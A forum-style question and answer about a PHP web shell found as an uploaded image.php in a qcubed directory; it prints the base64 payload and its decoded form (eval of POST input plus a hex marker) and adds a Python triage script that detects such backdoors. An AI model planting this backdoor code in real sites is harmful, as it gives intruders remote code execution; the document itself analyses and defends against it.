Ok so here’s what I’ve googled:
It seems there is an uploaded file named “image.php” that is uploaded in a qcubed directory.
That image.php file contains the following base64 code:
aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzMxMzkzNjJlMzIzMzMxMmQzMTM3MzIyZTMyMzgzYTY5NjY2MTYzNjU3MjZkNzA3NTYyNmQ2OTYzNjUzYTYxNjY2MTYzMzQzMjY1NzI2OTMwMzInOw==
Decoded, it adds up to this:
if(isset($_POST['e']))
eval(base64_decode($_POST['e']));
echo '3139362e3233312d3137322e32383a6966616365726d7075626d6963653a6166616334326572693032';
Searching for the outputted string I found similar qcubed vulnerabilities on other sites.
Decoding the last echoed string I got:
196.231-172.28:ifacermpubmice:afac42eri02
Which I really don't understand what it does (using: http://ostermiller.org/calc/encode.html).
Can you please explain to me what in particular I'm facing here?
What security vulnerability should I address in order to fix this?
The script will execute any PHP code it gets from the e POST variable, which of course is a horrible, most dangerous vulnerability.
The echo statement might be a confirmation for the attacking script that the correct version is installed or something.
However, this is only dangerous if the image.php file can actually be executed in that directory. It's hard to give advice on what to do without knowing how the file got there in the first place.
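An added example, not code from either post: a small Python triage function that peels the base64 layer from a suspicious file's contents, flags eval() fed by request input (the problem the answer describes), and decodes hex-encoded string literals such as the echoed marker. The function names and regexes are assumptions of this example; the sample is the string quoted in the question.

```python
import base64
import binascii
import re

# Payload string quoted in the question (contents of the uploaded image.php).
SAMPLE = (
    "aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkp"
    "O2VjaG8gJzMxMzkzNjJlMzIzMzMxMmQzMTM3MzIyZTMyMzgzYTY5NjY2MTYzNjU3MjZkNzA3"
    "NTYyNmQ2OTYzNjUzYTYxNjY2MTYzMzQzMjY1NzI2OTMwMzInOw=="
)

# eval() whose argument comes straight from request data, optionally via base64_decode().
EVAL_ON_INPUT = re.compile(
    r"eval\s*\(\s*(?:base64_decode\s*\(\s*)?"
    r"\$_(POST|GET|REQUEST|COOKIE)\s*\[\s*['\"]?(\w+)", re.I)
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")          # long base64-looking runs
HEX_LITERAL = re.compile(r"['\"]((?:[0-9a-fA-F]{2}){8,})['\"]")  # quoted hex strings

def try_b64(run):
    """Return the decoded text if run is valid base64 of printable ASCII, else None."""
    try:
        text = base64.b64decode(run, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    return text if text.isprintable() else None

def triage(content, max_depth=5):
    """Peel base64 layers; report eval-on-input sinks and decoded hex literals."""
    findings = {"layers": 0, "sinks": [], "markers": []}
    queue = [(content, 0)]
    while queue:
        text, depth = queue.pop()
        findings["layers"] = max(findings["layers"], depth)
        for m in EVAL_ON_INPUT.finditer(text):
            findings["sinks"].append((m.group(1).upper(), m.group(2)))
        for m in HEX_LITERAL.finditer(text):
            raw = bytes.fromhex(m.group(1))
            findings["markers"].append(raw.decode("ascii", "replace"))
        if depth < max_depth:
            for run in B64_RUN.findall(text):
                decoded = try_b64(run)
                if decoded:
                    queue.append((decoded, depth + 1))
    return findings

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Running it over every file in upload and cache directories, not only `.php` ones, gives a quick list of files that need manual review.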